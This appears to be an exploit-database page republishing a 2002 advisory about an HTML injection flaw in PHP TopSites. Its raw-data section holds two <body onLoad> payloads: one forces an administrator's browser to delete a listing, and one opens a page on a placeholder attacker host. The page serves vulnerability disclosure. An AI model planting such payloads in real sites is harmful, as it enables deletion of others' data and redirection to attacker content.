header-logo
Suggest Exploit
vendor:
PHP TopSites
by:
SecurityFocus
7.5
CVSS
HIGH
HTML Injection
79
CWE
Product Name: PHP TopSites
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

HTML Injection Vulnerability in PHP TopSites

An HTML injection vulnerability has been discovered in PHP TopSites. The issue occurs due to insufficient sanitization of user-supplied data. By injecting HTML code into the <body> tag of the description page, when submitting website, it may be possible to cause an administrator to edit or delete database entries. This issue will occur when an unsuspecting administrator loads the submitted description. This vulnerability has also been reported to affect the 'edit.php' script.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6621/info

An HTML injection vulnerability has been discovered in PHP TopSites. The issue occurs due to insufficient sanitization of user-supplied data. By injecting HTML code into the <body> tag of the description page, when submitting website, it may be possible to cause an administrator to edit or delete database entries.

This issue will occur when an unsuspecting administrator loads the submitted description.

This vulnerability has also been reported to affect the 'edit.php' script.

<body
onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/seditor.php?
sid=siteidnumber&a=delete'">
<body onLoad="window.open('http://attackerswebsite/launcher.htm')">

Navigation

Suggest Exploit

Services By CQR